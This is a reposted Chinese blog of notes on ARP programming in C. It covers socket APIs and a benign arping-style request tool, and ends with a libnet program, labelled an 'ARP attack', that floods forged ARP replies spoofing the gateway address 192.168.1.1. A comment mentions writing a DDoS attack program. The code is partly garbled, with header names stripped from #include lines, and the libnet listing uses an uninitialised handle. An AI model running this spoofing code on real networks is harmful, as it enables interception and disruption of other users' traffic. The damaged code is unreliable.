c语言ARP应用

 

对于windows环境,winsock不能用来发ARP请求:

发表于: 2002-04-23 11:45:12
arp是请求硬件地址的。winsock层次太高啦。。。
用winsock中的sendto函数,将其中的buf填入arp请求的分组格式,为什么不行呢?
用WinSock是不能发ARP包的,WinSock只能发IP包,
要发ARP包必须要用链路层的接口,因为必须告诉链路层的接口你的帧类型为ARP而不是IP

 winpcap

winpcap(windows packet capture)是windows平台下一个免费,公共的网络访问系统。
开发winpcap这个项目的目的在于为win32应用程序提供访问网络底层的能力。 WinPcap是用于网络封包抓取的一套工具,可适用于32/64位的操作平台上解析网络封包,
包含了核心的封包过滤,一个底层动态链接库,和一个高层系统函数库,及可用来直接存取封包的应用程序界面。
Winpcap是一个免费公开的软件系统。它用于windows系统下的直接的网络编程

 

Linux提供最常用的网络通信应用程序开发接口--Berkerley套接字(Socket).

Linux系统提供的基于数据链路层开发应用程序的接口集成在套接字中,
它是通过创建packet类型的套接宇.使应用程序可直接在数据链路层接
收或发送 未被系统处理的原始的数据报文(如ARP报文),用户也可以使
用packet类型的套接宇在物理层上定义自己特殊的网络协议。只有注册
号为0的用户(超级 用户)进程才能建立或打开用于访问网络低层的套接字.

 

 

设置网卡为混杂模式,地址结果相关分析:http://blog.csdn.net/cyx1743/article/details/6687771

相关数据结构、函数:

uid_t getuid(void);

它通常是一个小整形。函数返回一个调用程序的真实用户ID,一般来说,这个函数都是会调用成功的。

#include
#include
#include 
#include 
#include 
#include 
int main()
{
    uid_t uid;
    uid = getuid();
    printf("User IDs: uid=%d\n", uid);
    exit(0);
}

int setuid(uid_t uid);

设置实际用户id和有效用户id

#include
#include
#include<string.h>
int main()
{
    if(!setuid(1234)){
    printf("setuid successfully!\n");
    }else{
    printf("setuid error!");
    perror("setuid");
    }
return 0;
}

 

int inet_aton(const char *string, struct in_addr*addr);
参数描述:
1 输入参数string包含 ASCII表示的IP地址。
2 输出参数addr是将要用新的IP地址更新的结构。
 

hostent

hostent是host entry的缩写,该结构记录 主机的信息,包括 主机名、别名、地址类型、地址长度和地址列表。之所以 主机的地址是一个列表的形式,原因是当一个主机有多个网络接口时,自然有多个地址。

struct hostent{

h_name – 地址的正式名称。
h_aliases – 空字节-地址的预备名称的 指针。
h_addrtype –地址类型; 通常是 AF_INET。
h_length – 地址的比特长度。
h_addr_list – 零字节-主机网络地址 指针。网络 字节顺序。
h_addr - h_addr_list中的第一地址。};
 
设置套接口的选项。
#include
#include
int setsockopt(int sockfd, int level, int optname,const void *optval, socklen_t optlen);
sockfd:标识一个套接口的描述字。
level:选项定义的层次;支持SOL_SOCKET、IPPROTO_TCP、IPPROTO_IP和IPPROTO_IPV6。
optname:需设置的选项。
optval:指针,指向存放选项待设置的新值的缓冲区。
optlen:optval缓冲区长度。
 
 

getsockname()

getsockname()函数用于获取一个套接字的名字。

它用于一个已捆绑或已连接套接字s,本地地址将被返回。

本调用特别适用于如下情况:未调用bind()就调用了connect(),这时唯有getsockname()调用可以获知系统内定的本地地址。

在返回时,namelen参数包含了名字的实际字节数。

 

 

 

  1 //ARP协议的C语言实现源代码【转载】 收藏
  2 //什么是ARP协议
  3 //英文原义:ADDRESS RESOLUTION PROTOCOL
  4 //中文释义:(RFC - 826)地址解析协议
  5 
  6 #include 
  7 #include 
  8 #include 
  9 #include 
 10 #include 
 11 #include <string.h>
 12 #include 
 13 #include 
 14 #include 
 15 #include 
 16 #include 
 17 #include 
 18 #include 
 19 #include 
 20 #include 
 21 #include 
 22 #include 
 23 #include if.h>
 24 #include 
 25 #include 
 26 #include 
 27 #include in.h>
 28 #include 
 29 #define src_addr "192.168.0.239"   //需要进行arp解析的ip
 30 #define device  "eth0"                //本机的哪块网卡
 31 #define fill_buf "aaaaaaaaaaaa"
 32 int socket_id;
 33 char *target = src_addr;
 34 int send_count = 0;
 35 int recv_count = 0;
 36 struct in_addr  src, dst;
 37 struct sockaddr_ll   me, he;
 38 struct timeval   send_time, recv_time;
 39 struct in_addr get_src_ip(char * devices)//获得本机相应网卡的ip
 40 {
 41     struct sockaddr_in saddr;
 42     int sock_id = socket(AF_INET, SOCK_DGRAM, 0);//设置数据报socket
 43     if (sock_id < 0) {
 44         perror("socket");
 45         exit(2);
 46     }
 47     if (devices) {
 48         if (setsockopt(sock_id, SOL_SOCKET, SO_BINDTODEVICE, device, strlen(device) + 1) == -1)//将socketbind到网卡上
 49             perror("WARNING: interface is ignored");
 50     }
 51     int alen = sizeof(saddr);
 52     memset(&saddr, 0, sizeof(saddr));
 53     saddr.sin_port = htons(0x1000);//设置端口
 54     saddr.sin_family = AF_INET;
 55     if (connect(sock_id, (struct sockaddr*)&saddr, sizeof(saddr)) == -1) {//将socket连接到相应的inet地址上
 56         perror("connect");
 57         exit(2);
 58     }
 59     if (getsockname(sock_id, (struct sockaddr*)&saddr, &alen) == -1) {//通过socket获得绑定的ip地址
 60         perror("getsockname");
 61         exit(2);
 62     }
 63     close(sock_id);
 64     return saddr.sin_addr;
 65 }
 66 int check_device(char* if_dev, int ss)//网卡和socket    将网卡设置为混杂模式?
 67 {
 68     int ifindex;
 69     struct ifreq ifr;
 70     memset(&ifr, 0, sizeof(ifr));
 71     strncpy(ifr.ifr_name, if_dev, IFNAMSIZ - 1);//网卡设备名
 72     if (ioctl(ss, SIOCGIFINDEX, &ifr) < 0) {
 73         fprintf(stderr, "arping: unknown iface %s\n", if_dev);
 74         exit(2);
 75     }
 76     ifindex = ifr.ifr_ifindex;
 77     if (ioctl(ss, SIOCGIFFLAGS, (char*)&ifr)) {
 78         perror("ioctl(SIOCGIFFLAGS)");
 79         exit(2);
 80     }
 81     if (!(ifr.ifr_flags&IFF_UP)) {
 82         printf("Interface \"%s\" is down\n", if_dev);
 83         exit(2);
 84     }
 85     if (ifr.ifr_flags&(IFF_NOARP | IFF_LOOPBACK)) {
 86         printf("Interface \"%s\" is not ARPable\n", if_dev);
 87         exit(2);
 88     }
 89     return ifindex;
 90 } // check_device()
 91 
 92 int socket_init()
 93 {
 94     int s, s_errno;
 95     s = socket(PF_PACKET, SOCK_DGRAM, 0);//数据包
 96     s_errno = errno;
 97     me.sll_family = AF_PACKET;
 98     me.sll_ifindex = check_device(device, s);
 99     me.sll_protocol = htons(ETH_P_ARP);
100     if (bind(s, (struct sockaddr*)&me, sizeof(me)) == -1) {
101         perror("bind");
102         exit(2);
103     }
104     int alen = sizeof(me);
105     if (getsockname(s, (struct sockaddr*)&me, &alen) == -1) {
106         perror("getsockname");
107         exit(2);
108     }
109     if (me.sll_halen == 0) {
110         printf("Interface \"%s\" is not ARPable (no ll address)\n", device);
111         exit(2);
112     }
113     he = me;
114     memset(he.sll_addr, -1, he.sll_halen);  // set dmac addr FF:FF:FF:FF:FF:FF
115     return s;
116 }
117 int
118 create_pkt(unsigned char * buf, struct in_addr src, struct in_addr dst, struct sockaddr_ll * FROM, struct sockaddr_ll * TO)
119 {
120     struct arphdr *ah = (struct arphdr*) buf;
121     unsigned char *p = (unsigned char *)(ah + 1);
122     ah->ar_hrd = htons(FROM->sll_hatype);
123     if (ah->ar_hrd == htons(ARPHRD_FDDI))
124         ah->ar_hrd = htons(ARPHRD_ETHER);
125     ah->ar_pro = htons(ETH_P_IP);
126     ah->ar_hln = FROM->sll_halen;
127     ah->ar_pln = 4;
128     ah->ar_op = htons(ARPOP_REQUEST);
129     memcpy(p, &FROM->sll_addr, ah->ar_hln);
130     p += FROM->sll_halen;
131     memcpy(p, &src, 4);
132     p += 4;
133     memcpy(p, &TO->sll_addr, ah->ar_hln);
134     p += ah->ar_hln;
135     memcpy(p, &dst, 4);
136     p += 4;
137     memcpy(p, fill_buf, strlen(fill_buf));
138     p += 12;
139     return  (p - buf);
140 }
141 void send_pkt()
142 {
143     unsigned char send_buf[256];
144     int pkt_size = create_pkt(send_buf, src, dst, &me, &he);
145     gettimeofday(&send_time, NULL);
146     int cc = sendto(socket_id, send_buf, pkt_size, 0, (struct sockaddr*)&he, sizeof(he));
147     if (cc == pkt_size)
148         send_count++;
149     alarm(1);
150 }
151 int chk_recv_pkt(unsigned char * buf, struct sockaddr_ll * FROM)//解析arp数据
152 {
153     struct arphdr *ah = (struct arphdr*)buf;
154     unsigned char *p = (unsigned char *)(ah + 1);
155     struct in_addr src_ip, dst_ip;
156     if (ah->ar_op != htons(ARPOP_REQUEST) && ah->ar_op != htons(ARPOP_REPLY))
157         return 0;
158     if (ah->ar_pro != htons(ETH_P_IP) || ah->ar_pln != 4 || ah->ar_hln != me.sll_halen)
159         return 0;
160     memcpy(&src_ip, p + ah->ar_hln, 4);
161     memcpy(&dst_ip, p + ah->ar_hln + 4 + ah->ar_hln, 4);
162     if (src_ip.s_addr != dst.s_addr || src.s_addr != dst_ip.s_addr)
163         return 0;
164     return (p - buf);
165 }
166 void disp_info(int received, struct in_addr dst, int msecs, int usecs, struct sockaddr_ll from)
167 {
168     printf("%03d ", received);
169     printf("%s ", from.sll_pkttype == PACKET_HOST ? "Unicast" : "Broadcast");
170     printf("%s from %s", "reply", inet_ntoa(dst));
171     printf(" [%02X:%02X:%02X:%02X:%02X:%02X] ", from.sll_addr[0], from.sll_addr[1], \
172         from.sll_addr[2], from.sll_addr[3], from.sll_addr[4], from.sll_addr[5]);
173     printf(" %ld.%ld ms\n", (long int)msecs, (long int)usecs);
174     fflush(stdout);
175 }
176 void finish()
177 {
178     printf("\nSent %d ARP probe packet(s) \n", send_count);
179     printf("Received %d response(s)", recv_count);
180     printf("\n\n");
181     fflush(stdout);
182     exit(!recv_count);
183 }
184 ////////////////////////////////////////////////////////////////
185 int
186 main(int argc, char **argv)
187 {
188     uid_t uid = getuid();
189     setuid(uid);
190     if (*(argv + 1) != NULL)
191         target = *(argv + 1);//传入的第一个参数,待解析的ip地址
192     if (inet_aton(target, &dst) != 1) {//使用字符串ip更新dst地址结构中的网络字节序ip
193         struct hostent *hp;
194         hp = gethostbyname2(target, AF_INET);
195         printf("\ntarget = %s \n", target);
196         if (!hp) {
197             fprintf(stderr, "arping: unknown host %s\n", target);
198             exit(2);
199         }
200         memcpy(&dst, hp->h_addr, 4);
201     }
202     src = get_src_ip(device);//获得本机device网卡的ip
203     if (!src.s_addr) {
204         fprintf(stderr, "arping: no source address in not-DAD mode\n");
205         exit(2);
206     }
207     socket_id = socket_init();
208     printf("\nARPING %s ", inet_ntoa(dst));
209     printf("from %s %s\n\n", inet_ntoa(src), device ? : "");
210     signal(SIGINT, finish);
211     signal(SIGALRM, send_pkt);
212     send_pkt();
213     while (1)
214     {
215         struct sockaddr_ll from;
216         int alen = sizeof(from);
217         char recv_buf[0x1000];
218 
219         int recv_size = recvfrom(socket_id, recv_buf, sizeof(recv_buf), 0, (struct sockaddr *)&from, &alen);
220 
221         gettimeofday(&recv_time, NULL);
222         if (recv_size < 0) {
223             perror("arping: recvfrom");
224             continue;
225         }
226         if (chk_recv_pkt(recv_buf, &from) > 0) {
227             memcpy(he.sll_addr, from.sll_addr, he.sll_halen);
228             long usecs, msecs;
229             if (recv_time.tv_sec) {
230                 usecs = (recv_time.tv_sec - send_time.tv_sec) * 1000000 + recv_time.tv_usec - send_time.tv_usec;
231                 msecs = (usecs + 500) / 1000;
232                 usecs -= msecs * 1000 - 500;
233             }
234             recv_count++;
235             disp_info(recv_count, dst, msecs, usecs, from);
236         } // if (chk...)    
237 
238     }
239     return 0;
240 }

 

 

linux下使用libnet实现ARP攻击(转)

http://my.oschina.net/jiyufei/blog/179494

 1 #include "arp.h"
 2  
 3 int main(int argc,char **argv){
 4     libnet_t *l;
 5     int i,packet_size;      //发送的数据包的长度
 6     libnet_ptag_t arp_tag,ether_tag;
 7     char *device="eth0";
 8     char err_buf[LIBNET_ERRBUF_SIZE];
 9     char *destion_ip_str = "255.255.255.255";
10     char *source_ip_str = "192.168.1.1";
11     u_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};
12     u_char destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};
13     u_int32_t source_ip,destion_ip;
14     //将字符形式ip转换为网络字节序
15     source_ip = libnet_name2addr4(l,source_ip_str,LIBNET_RESOLVE);
16     destion_ip = libnet_name2addr4(l,destion_ip_str,LIBNET_RESOLVE);
17     //初始化libnet句柄
18     l = libnet_init(LIBNET_LINK,device,err_buf);
19     if(l == NULL){
20         printf("初始化libnet句柄失败:%s\n",err_buf);
21         exit(-1);
22     }
23     arp_tag = libnet_build_arp(
24         ARPHRD_ETHER,       //硬件地址类型,此处为以太网类型
25         ETHERTYPE_IP,       //协议地址类型
26         6,
27         4,
28         ARPOP_REPLY,        //ARP应答
29         source_hardware,
30         (u_int8_t *)&source_ip,
31         destion_hardware,
32         (u_int8_t *)&destion_ip,
33         NULL,       //无负载
34         0,          //负载长度为0
35         l,
36         0       //协议块标记,为0,表示新建协议块
37         );
38     ether_tag = libnet_build_ethernet(
39         (u_int8_t *)&destion_hardware,
40         (u_int8_t *)&source_hardware,
41         ETHERTYPE_ARP,
42         NULL,
43         0,
44         l,
45         0
46         );
47     i = 0;
48     while(1){
49         packet_size = libnet_write(l);      //发送构造的ARP数据包
50         usleep(10);
51         i++;
52     }
53     printf("数据包长度为:%d\n",packet_size);
54     libnet_destroy(l);
55     return 0;
56 }

/*目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC
(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。*/

 

也是libnet的arp,结合了校园网:http://bbs.csdn.net/topics/360266138

 

 

转载于:https://www.cnblogs.com/sunniflyer/p/3982785.html

你可能感兴趣的:(c语言ARP应用)